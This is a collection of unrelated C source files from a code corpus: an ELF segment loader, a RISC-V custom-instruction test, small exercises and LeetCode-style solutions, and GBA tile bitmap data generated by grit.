#include <errno.h>
#include <string.h>
#include <stdio.h>
#define ELF_LOAD(phdr, phnum, elf_start, self) \
do { \
int i; \
for(i=0; i < phnum; i++) { \
int r; \
if(phdr[i].p_type != PT_LOAD) \
continue; \
if(phdr[i].p_filesz > phdr[i].p_memsz) \
return -EINVAL; \
if(!phdr[i].p_filesz) \
return -EINVAL; \
r = doLoad( \
self, \
phdr[i].p_paddr, \
(char*)elf_start + phdr[i].p_offset, \
phdr[i].p_filesz); \
if(r != 0) \
return r; \
} \
return 0; \
} while(0)
int
elf32_load(
Elf32_Phdr *phdr,
int phnum,
void *elf_start,
void *self)
{
ELF_LOAD(phdr, phnum, elf_start, self);
}
int
elf64_load(
Elf64_Phdr *phdr,
int phnum,
void *elf_start,
void *self)
{
ELF_LOAD(phdr, phnum, elf_start, self);
}
long long
elf_load(
char *elf_start,
void *self,
int *is_64bit)
{
Elf32_Ehdr *hdr32 = (Elf32_Ehdr*)elf_start;
Elf64_Ehdr *hdr64 = (Elf64_Ehdr*)elf_start;
if (hdr32->e_ident[EI_MAG0] != ELFMAG0 ||
hdr32->e_ident[EI_MAG1] != ELFMAG1 ||
hdr32->e_ident[EI_MAG2] != ELFMAG2 ||
hdr32->e_ident[EI_MAG3] != ELFMAG3)
return -EINVAL;
if (hdr32->e_ident[4] == ELFCLASS32) {
int r = elf32_load(
(Elf32_Phdr *)(elf_start + hdr32->e_phoff),
hdr32->e_phnum,
elf_start,
self);
if (r<0)
return r;
*is_64bit = 0;
return hdr32->e_entry;
} else if (hdr64->e_ident[4] == ELFCLASS64) {
int r = elf64_load(
(Elf64_Phdr *)(elf_start + hdr64->e_phoff),
hdr64->e_phnum,
elf_start,
self);
if (r<0)
return r;
*is_64bit = 1;
return hdr64->e_entry;
} else {
return -EINVAL;
}
}
|
the_stack_data/72011941.c | // The following is a RISC-V program to test the functionality of the
// dummy RoCC accelerator.
// Compile with riscv64-unknown-elf-gcc dummy_rocc_test.c
// Run with spike --extension=dummy_rocc pk a.out
#include <assert.h>
#include <stdio.h>
#include <stdint.h>
int main() {
uint64_t x = 123, y = 456, z = 0;
// load x into accumulator 2 (funct=0)
asm volatile ("custom0 x0, %0, 2, 0" : : "r"(x));
// read it back into z (funct=1) to verify it
asm volatile ("custom0 %0, x0, 2, 1" : "=r"(z));
assert(z == x);
// accumulate 456 into it (funct=3)
asm volatile ("custom0 x0, %0, 2, 3" : : "r"(y));
// verify it
asm volatile ("custom0 %0, x0, 2, 1" : "=r"(z));
assert(z == x+y);
// do it all again, but initialize acc2 via memory this time (funct=2)
asm volatile ("custom0 x0, %0, 2, 2" : : "r"(&x));
asm volatile ("custom0 x0, %0, 2, 3" : : "r"(y));
asm volatile ("custom0 %0, x0, 2, 1" : "=r"(z));
assert(z == x+y);
printf("success!\n");
}
|
the_stack_data/242331771.c | #include <stdbool.h>
bool quit = false; |
the_stack_data/4546.c | /*extern int main2(void);
asm("main2:\n\
mov %rax, %rax\n\
ret");*/
/*#include <stdio.h>
void fun() {
char* str = "hello test\n";
return;
}*/
#include <stdio.h>
#define USEGLOBAL
#ifdef USEGLOBAL
int globVar = 34;
#endif
int test() {
printf("Does this work???\n");
#ifdef USEGLOBAL
return globVar;
#else
return 4;
#endif
}
int main() {
//char buf[200];
//scanf("%s", buf);
//asm(buf);
//main2();
//fun();
int x = 2;
//return 13;
return test();
}
|
the_stack_data/6386816.c | /*
* File: ex_27.c
* Author: Vinicius
*/
#include <stdio.h>
#include <stdlib.h>
float soma_superior (float** mat, int n);
int main(int argc, char** argv) {
int **mat;
int n,i,j;
printf("Digiite o numero de linhas/colunas da matriz: ");
scanf("%d",&n);
mat=(int**)malloc(n*sizeof(float*));
for (i=0; i<n; i++)
mat[i] = (float*) malloc(n*sizeof(float));
printf("\nDigite a matriz:\n");
for(i=0;i<n;i++){
for(j=0;j<n;j++){
printf("Digite o valor [%d][%d]: ",i,j);
scanf("%f",&mat[i][j]);
}
}
printf("\nRetorno: %f ",soma_superior (mat,n));
for (i=0; i<n; i++)
free (mat[i]);
free (mat);
return (EXIT_SUCCESS);
}
float soma_superior (float** mat, int n){
int i,j;
float soma;
for (i=0; i<n; i++){
for (j=0; j<n; j++){
if(i < j) soma += mat[i][j];
}
}
return soma;
}
|
the_stack_data/155278.c | /*******************************************************************************
*
* This program does a little bit of work, and then calculates the amount of
* elapsed time.
*
******************************************************************************/
#include <stdint.h>
#include <stdio.h>
#include <sys/time.h>
/*******************************************************************************
* Given 2 struct timeval data structures, calculate the elapsed time. Return
* a string back to the caller that contains the elapsed time. Note that this
* function is not thread safe. It uses a static buffer to hold the result.
******************************************************************************/
static const char *
calc_elapsed_time(struct timeval *bef, struct timeval *aft)
{
static char res[128];
int64_t elapsed_tvsec = (aft->tv_sec - bef->tv_sec);
int64_t elapsed_tvusec = (aft->tv_usec - bef->tv_usec);
int64_t elapsed_usec = (elapsed_tvsec * 1000000) + elapsed_tvusec;
int64_t sec = elapsed_usec / 1000000;
int64_t usec = elapsed_usec % 1000000;
snprintf(res, sizeof(res) - 1, "%3jd.%06jd", sec, usec);
return res;
}
/*******************************************************************************
* Given p, try to determine if it's prime by trying all possible factors. This
* is a brute force test. It can easily burn some CPU cycles.
*
* Returns 0 if p is prime.
* Returns 1 if p is NOT prime.
******************************************************************************/
static int
do_some_work(int64_t p)
{
int64_t i = 2;
while(i < p) {
if((p % i++) == 0) {
return 1;
}
}
return 0;
}
/*******************************************************************************
* Run a few tests. Display the elapsed time for each test.
******************************************************************************/
int main(int argc, char **argv)
{
int64_t p;
for(p = 1; p < 1000000000000ll; p *= 11) {
/* Get a starting timestamp. */
struct timeval bef;
gettimeofday(&bef, 0);
int res = do_some_work(++p);
/* Get the ending timestamp. */
struct timeval aft;
gettimeofday(&aft, 0);
printf("%s seconds: %12jd %s prime.\n",
calc_elapsed_time(&bef, &aft), p,
(res == 0) ? "is" : "is not");
}
return 0;
}
|
the_stack_data/72013412.c | /* Auto-generated, do not edit. */
const char *mg_build_id = "20220212-183131/2.19.1-gd52032f";
const char *mg_build_timestamp = "2022-02-12T18:31:31Z";
const char *mg_build_version = "2.19.1";
|
the_stack_data/13945.c | int checkEnemy(char **grid, int **d, int gridSize, int colSize)
{
int ret = 0;
for (int i = 0; i < gridSize; i++)
{
int wIdx = 0;
int bomb = 0;
for (int j = 0; j < colSize; j++)
{
if (grid[i][j] == 'W')
{
// Update bomb
for (int x = wIdx; x < j; x++)
{
if (grid[i][x] == '0')
{
d[i][x] += bomb;
}
}
bomb = 0;
wIdx = j+1;
} else if (grid[i][j] == 'E')
{
bomb++;
}
}
for (int x = wIdx; x < colSize; x++)
{
if (grid[i][x] == '0')
{
d[i][x] += bomb;
}
}
}
for (int j = 0; j < colSize; j++)
{
int wIdx = 0;
int bomb = 0;
for (int i = 0; i < gridSize; i++)
{
if (grid[i][j] == 'W')
{
// Update bomb
for (int x = wIdx; x < i; x++)
{
if (grid[x][j] == '0')
{
d[x][j] += bomb;
ret = (ret > d[x][j] ? ret : d[x][j]);
}
}
bomb = 0;
wIdx = i+1;
} else if (grid[i][j] == 'E')
{
bomb++;
}
}
for (int x = wIdx; x < gridSize; x++)
{
if (grid[x][j] == '0')
{
d[x][j] += bomb;
ret = (ret > d[x][j] ? ret : d[x][j]);
}
}
}
return ret;
}
int maxKilledEnemies(char** grid, int gridSize, int* gridColSize)
{
if (gridSize == 0)
{
return 0;
}
int colSize = gridColSize[0];
int **d = malloc(sizeof(int *)*gridSize);
for (int i = 0; i < gridSize; i++)
{
d[i] = calloc(colSize, sizeof(int));
}
int ret = checkEnemy(grid, d, gridSize, colSize);
for (int i = 0; i < gridSize; i++)
{
free(d[i]);
}
free(d);
return ret;
}
|
the_stack_data/492825.c | /*
709. To Lower Case
709_to_lower_case.c
Given a string s, return the string after replacing every uppercase letter with the same lowercase letter.
Example 1:
Input: s = "Hello"
Output: "hello"
Example 2:
Input: s = "here"
Output: "here"
Example 3:
Input: s = "LOVELY"
Output: "lovely"
Constraints:
1 <= s.length <= 100
s consists of printable ASCII characters.
*/
#include <stdio.h>
#include <string.h>
/*
Verison 1
*/
char * toLowerCase(char * s){
for (char *p = s; *p != '\0'; p++)
if (*p >= 'A' && *p <= 'Z')
*p += 'a' - 'A';
return s;
}
/*
Example 1:
Input: s = "Hello"
Output: "hello"
Example 2:
Input: s = "here"
Output: "here"
Example 3:
Input: s = "LOVELY"
Output: "lovely"
*/
int main() {
char s1[] = "Hello";
char s2[] = "here";
char s3[] = "LOVELY";
printf("ret = %s\n", toLowerCase(s1));
printf("ret = %s\n", toLowerCase(s2));
printf("ret = %s\n", toLowerCase(s3));
return 0;
}
|
the_stack_data/534012.c |
//{{BLOCK(GalleryTitleLeft)
//======================================================================
//
// GalleryTitleLeft, 80x320@2,
// + 400 tiles not compressed
// + regular map (flat), not compressed, 10x40
// Total size: 6416 + 800 = 7216
//
// Exported by Cearn's GBA Image Transmogrifier, v0.8.6
// ( http://www.coranac.com/projects/#grit )
//
//======================================================================
const unsigned int GalleryTitleLeftTiles[1604] __attribute__((aligned(4)))=
{
0x00000000,0x00000000,0x00000000,0x00000000,
0x35C03FC0,0xF5C035C0,0xD700D7C0,0x5F00D700,0x57D7FFFF,0x35D7F5D7,0x35F535F5,0xF5FD35F5,
0xD7D5FFFF,0xD75CD75F,0xD75CD75C,0xD75FD75C,0x57C0FF00,0x35C0F5C0,0x35C035C0,0xF5FF35C0,
0x5CF5FC3F,0xD7FF5FD7,0xD7C0D700,0xF5D755FF,0xD5CDFFCF,0x55F5D5FD,0x75F555F5,0xF5D775D5,
0x57D7FFFF,0x35D7F5D7,0x35D535D7,0xF5D535D5,0x03D500FF,0x035C035F,0x035C035C,0x035F035C,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0xFC005C00,0x00000000,0x00000000,0x00000000,0xFF0F57CD,0x00000000,0x00000000,0x00000000,
0xFFFF57D5,0x00000000,0x00000000,0x00000000,0xFFFF57D5,0x00000000,0x00000000,0x00000000,
0x3FFF35F5,0x00000000,0x00000000,0x00000000,0xFFFFF5D7,0x00000000,0x00000000,0x00000000,
0xFFFF57D5,0x00000000,0x00000000,0x00000000,0x00FF03D5,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0xAC000000,0xAAB0AAC0,0x5AAC5AB0,0x5AAC5AAC,
0x00EA0000,0x3AAA0EAA,0xEAAA3AAA,0xEAAAEAAA,0xFFF00000,0xDDF05570,0xFF705570,0xFF70FF70,
0xFFFF0000,0xDDDD5555,0xAA7F5555,0xAA7FAA7F,0xFFFF0000,0xDDDD5555,0xAA6A5555,0xAA6AAA6A,
0xFFFF0000,0xDDDD5555,0xAA6A5555,0xAA6AAA6A,0xFFFF0000,0xDDDD5555,0xAA6A5555,0xAA6AAA6A,
0x03FF0000,0x03DD0355,0xC36A0355,0xC36AC36A,0xAAC00000,0xAAABAAAC,0x65AA55AB,0x55AA65AA,
0x000E0000,0x03AA00EA,0x0EA903AA,0x0EAA0EA9,0x5AAC5AAC,0xAABC5A9C,0xA5F0AA70,0xFC005FC0,
0xEAAAEAAA,0xFAAADA95,0x3D6A36AA,0x00FF0FD5,0xFF70FF70,0x5570FF70,0x5570DDF0,0x0000FFF0,
0xAA7FAA7F,0x5555AA7F,0x5555DDDD,0x0000FFFF,0xAA6AAA6A,0x5555AA6A,0x5555DDDD,0x0000FFFF,
0xAA6AAA6A,0x5555AA6A,0x5555DDDD,0x0000FFFF,0xAA6AAA6A,0x5555AA6A,0x5555DDDD,0x0000FFFF,
0xC36AC36A,0xC355C36A,0x035503DD,0x000003FF,0x65AA65AA,0xAAAB65A9,0xAA5FAAA7,0xFFC055FC,
0x0EA90EA9,0x0FAA0DA9,0x03D6036A,0x000F00FD,0x00000000,0x00000000,0x00000000,0x00000000,
0x35C03FC0,0xF5C035C0,0xD700D7C0,0x5F00D700,0x57D7FFFF,0x35D7F5D7,0x35F535F5,0xF5FD35F5,
0xD7D5FFFF,0xD75CD75F,0xD75CD75C,0xD75FD75C,0x57C0FF00,0x35C0F5C0,0x35C035C0,0xF5FF35C0,
0x5CF5FC3F,0xD7FF5FD7,0xD7C0D700,0xF5D755FF,0xD5CDFFCF,0x55F5D5FD,0x75F555F5,0xF5D775D5,
0x57D7FFFF,0x35D7F5D7,0x35D535D7,0xF5D535D5,0x03D500FF,0x035C035F,0x035C035C,0x035F035C,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0xFC005C00,0x00000000,0x00000000,0x00000000,0xFF0F57CD,0x00000000,0x00000000,0x00000000,
0xFFFF57D5,0x00000000,0x00000000,0x00000000,0xFFFF57D5,0x00000000,0x00000000,0x00000000,
0x3FFF35F5,0x00000000,0x00000000,0x00000000,0xFFFFF5D7,0x00000000,0x00000000,0x00000000,
0xFFFF57D5,0x00000000,0x00000000,0x00000000,0x00FF03D5,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0xFC000000,0xAAF0AFC0,0x5ABCAAB0,0x5AAC5AAC,
0x00FF0000,0x3EAA0FEA,0xFAAA3AAA,0xEAAAEAAA,0xFFF00000,0x77705570,0xFF705570,0xFF70FF70,
0xFFFF0000,0x77775555,0xAA7F5555,0xAA7FAA7F,0xFFFF0000,0x77775555,0xAA6A5555,0xAA6AAA6A,
0xFFFF0000,0x77775555,0xAA6A5555,0xAA6AAA6A,0xFFFF0000,0x77775555,0xAA6A5555,0xAA6AAA6A,
0x03FF0000,0x03770355,0xC36A0355,0xC36AC36A,0xFFC00000,0xAAAFAAFC,0x55ABAAAB,0x65AA65AA,
0x000F0000,0x03EA00FE,0x0FAA03AA,0x0EA90EA9,0x5AAC5AAC,0x5ABC5AAC,0xAAF0AAB0,0xFC00AFC0,
0xEAAAEAAA,0xFA95EAAA,0x3EAA3AAA,0x00FF0FEA,0xFF70FF70,0x5570FF70,0x55707770,0x0000FFF0,
0xAA7FAA7F,0x5555AA7F,0x55557777,0x0000FFFF,0xAA6AAA6A,0x5555AA6A,0x55557777,0x0000FFFF,
0xAA6AAA6A,0x5555AA6A,0x55557777,0x0000FFFF,0xAA6AAA6A,0x5555AA6A,0x55557777,0x0000FFFF,
0xC36AC36A,0xC355C36A,0x03550377,0x000003FF,0x65AA55AA,0x65AB65AA,0xAAAFAAAB,0xFFC0AAFC,
0x0EA90EAA,0x0FA90EA9,0x03EA03AA,0x000F00FE,0x00000000,0x00000000,0x00000000,0x00000000,
0x5700FF00,0xD700D700,0x5700D700,0xD700D700,0x5FD5FCFF,0xD75CD75F,0xD7D5D75F,0xD75CD75F,
0x7F55F3FF,0x5D705D7F,0x5D705D70,0x5D7F5D70,0xFD55CFFF,0x75C375FF,0x75C375C3,0x75FF75C3,
0xF5553FFF,0xD70DD7FD,0xD70DD70D,0xD7FDD70D,0xCD5CCFFC,0xF5D7FD5F,0xF5D7F5D7,0xD7F5D555,
0xF555FFFF,0xD735D7F5,0xF555D7F5,0xD735D7F5,0x0035003F,0x00350035,0x00350035,0x0035003F,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0xFF00D700,0x00000000,0x00000000,0x00000000,0xFFFC5F5C,0x00000000,0x00000000,0x00000000,
0xF3FF7F55,0x00000000,0x00000000,0x00000000,0xCFFFFD55,0x00000000,0x00000000,0x00000000,
0xFFFFF555,0x00000000,0x00000000,0x00000000,0xFF3FD735,0x00000000,0x00000000,0x00000000,
0xFF3FD735,0x00000000,0x00000000,0x00000000,0x003F0035,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0xAC000000,0xAAB0AAC0,0x5AAC5AB0,0x5AAC5AAC,
0x00EA0000,0x3AAA0EAA,0xEAAA3AAA,0xEAAAEAAA,0xFFF00000,0xDDF05570,0xAA705570,0xAA70AA70,
0xFFFF0000,0xDDDD5555,0xFF6A5555,0xFF6AFF6A,0xFFFF0000,0xDDDD5555,0xAA7F5555,0xAA7FAA7F,
0xFFFF0000,0xDDDD5555,0xAA6A5555,0xAA6AAA6A,0xFFFF0000,0xDDDD5555,0xAA6A5555,0xAA6AAA6A,
0x03FF0000,0x03DD0355,0xC36A0355,0xC36AC36A,0xAAC00000,0xAAABAAAC,0x65AA55AB,0x55AA65AA,
0x000E0000,0x03AA00EA,0x0EA903AA,0x0EAA0EA9,0x5AAC5AAC,0xAABC5A9C,0xA5F0AA70,0xFC005FC0,
0xEAAAEAAA,0xFAAADA95,0x3D6A36AA,0x00FF0FD5,0xAA70AA70,0x5570AA70,0x5570DDF0,0x0000FFF0,
0xFF6AFF6A,0x5555FF6A,0x5555DDDD,0x0000FFFF,0xAA7FAA7F,0x5555AA7F,0x5555DDDD,0x0000FFFF,
0xAA6AAA6A,0x5555AA6A,0x5555DDDD,0x0000FFFF,0xAA6AAA6A,0x5555AA6A,0x5555DDDD,0x0000FFFF,
0xC36AC36A,0xC355C36A,0x035503DD,0x000003FF,0x65AA65AA,0xAAAB65A9,0xAA5FAAA7,0xFFC055FC,
0x0EA90EA9,0x0FAA0DA9,0x03D6036A,0x000F00FD,0x00000000,0x00000000,0x00000000,0x00000000,
0x5700FF00,0xD700D700,0x5700D700,0xD700D700,0x5FD5FCFF,0xD75CD75F,0xD7D5D75F,0xD75CD75F,
0x7F55F3FF,0x5D705D7F,0x5D705D70,0x5D7F5D70,0xFD55CFFF,0x75C375FF,0x75C375C3,0x75FF75C3,
0xF5553FFF,0xD70DD7FD,0xD70DD70D,0xD7FDD70D,0xCD5CCFFC,0xF5D7FD5F,0xF5D7F5D7,0xD7F5D555,
0xF555FFFF,0xD735D7F5,0xF555D7F5,0xD735D7F5,0x0035003F,0x00350035,0x00350035,0x0035003F,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0xFF00D700,0x00000000,0x00000000,0x00000000,0xFFFC5F5C,0x00000000,0x00000000,0x00000000,
0xF3FF7F55,0x00000000,0x00000000,0x00000000,0xCFFFFD55,0x00000000,0x00000000,0x00000000,
0xFFFFF555,0x00000000,0x00000000,0x00000000,0xFF3FD735,0x00000000,0x00000000,0x00000000,
0xFF3FD735,0x00000000,0x00000000,0x00000000,0x003F0035,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0xFC000000,0xAAF0AFC0,0x5ABCAAB0,0x5AAC5AAC,
0x00FF0000,0x3EAA0FEA,0xFAAA3AAA,0xEAAAEAAA,0xFFF00000,0x77705570,0xAA705570,0xAA70AA70,
0xFFFF0000,0x77775555,0xFF6A5555,0xFF6AFF6A,0xFFFF0000,0x77775555,0xAA7F5555,0xAA7FAA7F,
0xFFFF0000,0x77775555,0xAA6A5555,0xAA6AAA6A,0xFFFF0000,0x77775555,0xAA6A5555,0xAA6AAA6A,
0x03FF0000,0x03770355,0xC36A0355,0xC36AC36A,0xFFC00000,0xAAAFAAFC,0x55ABAAAB,0x65AA65AA,
0x000F0000,0x03EA00FE,0x0FAA03AA,0x0EA90EA9,0x5AAC5AAC,0x5ABC5AAC,0xAAF0AAB0,0xFC00AFC0,
0xEAAAEAAA,0xFA95EAAA,0x3EAA3AAA,0x00FF0FEA,0xAA70AA70,0x5570AA70,0x55707770,0x0000FFF0,
0xFF6AFF6A,0x5555FF6A,0x55557777,0x0000FFFF,0xAA7FAA7F,0x5555AA7F,0x55557777,0x0000FFFF,
0xAA6AAA6A,0x5555AA6A,0x55557777,0x0000FFFF,0xAA6AAA6A,0x5555AA6A,0x55557777,0x0000FFFF,
0xC36AC36A,0xC355C36A,0x03550377,0x000003FF,0x65AA55AA,0x65AB65AA,0xAAAFAAAB,0xFFC0AAFC,
0x0EA90EAA,0x0FA90EA9,0x03EA03AA,0x000F00FE,0x0D700FF0,0x3D700D70,0x55C0F5F0,0xD7C055C0,
0x735CF3FC,0x5F5F7F5C,0x5FD55FD7,0xD7F557D5,0xD735FF3F,0xD7D7D7F5,0xD7D7D7D7,0xD75FD755,
0xF5C03FC0,0x75C0F5C0,0x55C055C0,0xF5FF75C0,0xF0D7C0FF,0x703D70F5,0x700F700F,0x70F5703D,
0x5D55FFFF,0x7FCD55FD,0xC00DF00D,0x35FD3FCD,0xF5C3FFC3,0x7D7D75FF,0x73D77F55,0x70D770D7,
0x7D55FFFF,0x7FCD75FD,0x700D700D,0x75FD7FCD,0x5C0DFC0F,0x5C0D5C0D,0x5C0D5C0D,0x5FFD5C0D,
0x035503FF,0x00FF03FF,0x00FF00D5,0x03FF0003,0xFF00D700,0x00000000,0x00000000,0x00000000,
0xFF3FD735,0x00000000,0x00000000,0x00000000,0xFFFC575C,0x00000000,0x00000000,0x00000000,
0x3FFFF5D5,0x00000000,0x00000000,0x00000000,0xC0FFF0D7,0x00000000,0x00000000,0x00000000,
0x0FFF3D55,0x00000000,0x00000000,0x00000000,0xC0FFF0D7,0x00000000,0x00000000,0x00000000,
0xFFFF7D55,0x00000000,0x00000000,0x00000000,0xFFFF5D55,0x00000000,0x00000000,0x00000000,
0x03FF0355,0x00000000,0x00000000,0x00000000,0xAC000000,0xAAB0AAC0,0x5AAC5AB0,0x5AAC5AAC,
0x00EA0000,0x3AAA0EAA,0xEAAA3AAA,0xEAAAEAAA,0xFFF00000,0xDDF05570,0xAA705570,0xAA70AA70,
0xFFFF0000,0xDDDD5555,0xAA6A5555,0xAA6AAA6A,0xFFFF0000,0xDDDD5555,0xFF6A5555,0xFF6AFF6A,
0xFFFF0000,0xDDDD5555,0xAA7F5555,0xAA7FAA7F,0xFFFF0000,0xDDDD5555,0xAA6A5555,0xAA6AAA6A,
0x03FF0000,0x03DD0355,0xC36A0355,0xC36AC36A,0xAAC00000,0xAAABAAAC,0x65AA55AB,0x55AA65AA,
0x000E0000,0x03AA00EA,0x0EA903AA,0x0EAA0EA9,0x5AAC5AAC,0xAABC5A9C,0xA5F0AA70,0xFC005FC0,
0xEAAAEAAA,0xFAAADA95,0x3D6A36AA,0x00FF0FD5,0xAA70AA70,0x5570AA70,0x5570DDF0,0x0000FFF0,
0xAA6AAA6A,0x5555AA6A,0x5555DDDD,0x0000FFFF,0xFF6AFF6A,0x5555FF6A,0x5555DDDD,0x0000FFFF,
0xAA7FAA7F,0x5555AA7F,0x5555DDDD,0x0000FFFF,0xAA6AAA6A,0x5555AA6A,0x5555DDDD,0x0000FFFF,
0xC36AC36A,0xC355C36A,0x035503DD,0x000003FF,0x65AA65AA,0xAAAB65A9,0xAA5FAAA7,0xFFC055FC,
0x0EA90EA9,0x0FAA0DA9,0x03D6036A,0x000F00FD,0x0D700FF0,0x3D700D70,0x55C0F5F0,0xD7C055C0,
0x735CF3FC,0x5F5F7F5C,0x5FD55FD7,0xD7F557D5,0xD735FF3F,0xD7D7D7F5,0xD7D7D7D7,0xD75FD755,
0xF5C03FC0,0x75C0F5C0,0x55C055C0,0xF5FF75C0,0xF0D7C0FF,0x703D70F5,0x700F700F,0x70F5703D,
0x5D55FFFF,0x7FCD55FD,0xC00DF00D,0x35FD3FCD,0xF5C3FFC3,0x7D7D75FF,0x73D77F55,0x70D770D7,
0x7D55FFFF,0x7FCD75FD,0x700D700D,0x75FD7FCD,0x5C0DFC0F,0x5C0D5C0D,0x5C0D5C0D,0x5FFD5C0D,
0x035503FF,0x00FF03FF,0x00FF00D5,0x03FF0003,0xFF00D700,0x00000000,0x00000000,0x00000000,
0xFF3FD735,0x00000000,0x00000000,0x00000000,0xFFFC575C,0x00000000,0x00000000,0x00000000,
0x3FFFF5D5,0x00000000,0x00000000,0x00000000,0xC0FFF0D7,0x00000000,0x00000000,0x00000000,
0x0FFF3D55,0x00000000,0x00000000,0x00000000,0xC0FFF0D7,0x00000000,0x00000000,0x00000000,
0xFFFF7D55,0x00000000,0x00000000,0x00000000,0xFFFF5D55,0x00000000,0x00000000,0x00000000,
0x03FF0355,0x00000000,0x00000000,0x00000000,0xFC000000,0xAAF0AFC0,0x5ABCAAB0,0x5AAC5AAC,
0x00FF0000,0x3EAA0FEA,0xFAAA3AAA,0xEAAAEAAA,0xFFF00000,0x77705570,0xAA705570,0xAA70AA70,
0xFFFF0000,0x77775555,0xAA6A5555,0xAA6AAA6A,0xFFFF0000,0x77775555,0xFF6A5555,0xFF6AFF6A,
0xFFFF0000,0x77775555,0xAA7F5555,0xAA7FAA7F,0xFFFF0000,0x77775555,0xAA6A5555,0xAA6AAA6A,
0x03FF0000,0x03770355,0xC36A0355,0xC36AC36A,0xFFC00000,0xAAAFAAFC,0x55ABAAAB,0x65AA65AA,
0x000F0000,0x03EA00FE,0x0FAA03AA,0x0EA90EA9,0x5AAC5AAC,0x5ABC5AAC,0xAAF0AAB0,0xFC00AFC0,
0xEAAAEAAA,0xFA95EAAA,0x3EAA3AAA,0x00FF0FEA,0xAA70AA70,0x5570AA70,0x55707770,0x0000FFF0,
0xAA6AAA6A,0x5555AA6A,0x55557777,0x0000FFFF,0xFF6AFF6A,0x5555FF6A,0x55557777,0x0000FFFF,
0xAA7FAA7F,0x5555AA7F,0x55557777,0x0000FFFF,0xAA6AAA6A,0x5555AA6A,0x55557777,0x0000FFFF,
0xC36AC36A,0xC355C36A,0x03550377,0x000003FF,0x65AA55AA,0x65AB65AA,0xAAAFAAAB,0xFFC0AAFC,
0x0EA90EAA,0x0FA90EA9,0x03EA03AA,0x000F00FE,0x00000000,0x00000000,0x00000000,0x00000000,
0xC000C000,0xC000C000,0xC000C000,0xC000C000,0xF5553FFF,0xD7F5D7F5,0xD7F5F555,0xD7F5D735,
0xCD5CCFFC,0xF5D7FD5F,0xF5D7F5D7,0xD7F5D555,0xD7D5FFFF,0xD755D7D5,0xD575D755,0xD5F5D575,
0xCD5CCFFC,0xF5D7FD5F,0xF5D7F5D7,0xD7F5D555,0xD7D5FFFF,0xD755D7D5,0xD575D755,0xD5F5D575,
0x0D5C0FFC,0x35D73D5F,0xF5D735D7,0xD7F5D555,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0xC000C000,0x00000000,0x00000000,0x00000000,0xFFFFF555,0x00000000,0x00000000,0x00000000,
0xFF3FD735,0x00000000,0x00000000,0x00000000,0xFFFFD5F5,0x00000000,0x00000000,0x00000000,
0xFF3FD735,0x00000000,0x00000000,0x00000000,0xFFFFD5F5,0x00000000,0x00000000,0x00000000,
0xFF3FD735,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0xAC000000,0xAAB0AAC0,0x5AAC5AB0,0x5AAC5AAC,
0x00EA0000,0x3AAA0EAA,0xEAAA3AAA,0xEAAAEAAA,0xFFF00000,0xDDF05570,0xAA705570,0xAA70AA70,
0xFFFF0000,0xDDDD5555,0xAA6A5555,0xAA6AAA6A,0xFFFF0000,0xDDDD5555,0xAA6A5555,0xAA6AAA6A,
0xFFFF0000,0xDDDD5555,0xFF6A5555,0xFF6AFF6A,0xFFFF0000,0xDDDD5555,0xAA7F5555,0xAA7FAA7F,
0x03FF0000,0x03DD0355,0xC36A0355,0xC36AC36A,0xAAC00000,0xAAABAAAC,0x65AA55AB,0x55AA65AA,
0x000E0000,0x03AA00EA,0x0EA903AA,0x0EAA0EA9,0x5AAC5AAC,0xAABC5A9C,0xA5F0AA70,0xFC005FC0,
0xEAAAEAAA,0xFAAADA95,0x3D6A36AA,0x00FF0FD5,0xAA70AA70,0x5570AA70,0x5570DDF0,0x0000FFF0,
0xAA6AAA6A,0x5555AA6A,0x5555DDDD,0x0000FFFF,0xAA6AAA6A,0x5555AA6A,0x5555DDDD,0x0000FFFF,
0xFF6AFF6A,0x5555FF6A,0x5555DDDD,0x0000FFFF,0xAA7FAA7F,0x5555AA7F,0x5555DDDD,0x0000FFFF,
0xC36AC36A,0xC355C36A,0x035503DD,0x000003FF,0x65AA65AA,0xAAAB65A9,0xAA5FAAA7,0xFFC055FC,
0x0EA90EA9,0x0FAA0DA9,0x03D6036A,0x000F00FD,0x00000000,0x00000000,0x00000000,0x00000000,
0xC000C000,0xC000C000,0xC000C000,0xC000C000,0xF5553FFF,0xD7F5D7F5,0xD7F5F555,0xD7F5D735,
0xCD5CCFFC,0xF5D7FD5F,0xF5D7F5D7,0xD7F5D555,0xD7D5FFFF,0xD755D7D5,0xD575D755,0xD5F5D575,
0xCD5CCFFC,0xF5D7FD5F,0xF5D7F5D7,0xD7F5D555,0xD7D5FFFF,0xD755D7D5,0xD575D755,0xD5F5D575,
0x0D5C0FFC,0x35D73D5F,0xF5D735D7,0xD7F5D555,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0xC000C000,0x00000000,0x00000000,0x00000000,0xFFFFF555,0x00000000,0x00000000,0x00000000,
0xFF3FD735,0x00000000,0x00000000,0x00000000,0xFFFFD5F5,0x00000000,0x00000000,0x00000000,
0xFF3FD735,0x00000000,0x00000000,0x00000000,0xFFFFD5F5,0x00000000,0x00000000,0x00000000,
0xFF3FD735,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
0x00000000,0x00000000,0x00000000,0x00000000,0xFC000000,0xAAF0AFC0,0x5ABCAAB0,0x5AAC5AAC,
0x00FF0000,0x3EAA0FEA,0xFAAA3AAA,0xEAAAEAAA,0xFFF00000,0x77705570,0xAA705570,0xAA70AA70,
0xFFFF0000,0x77775555,0xAA6A5555,0xAA6AAA6A,0xFFFF0000,0x77775555,0xAA6A5555,0xAA6AAA6A,
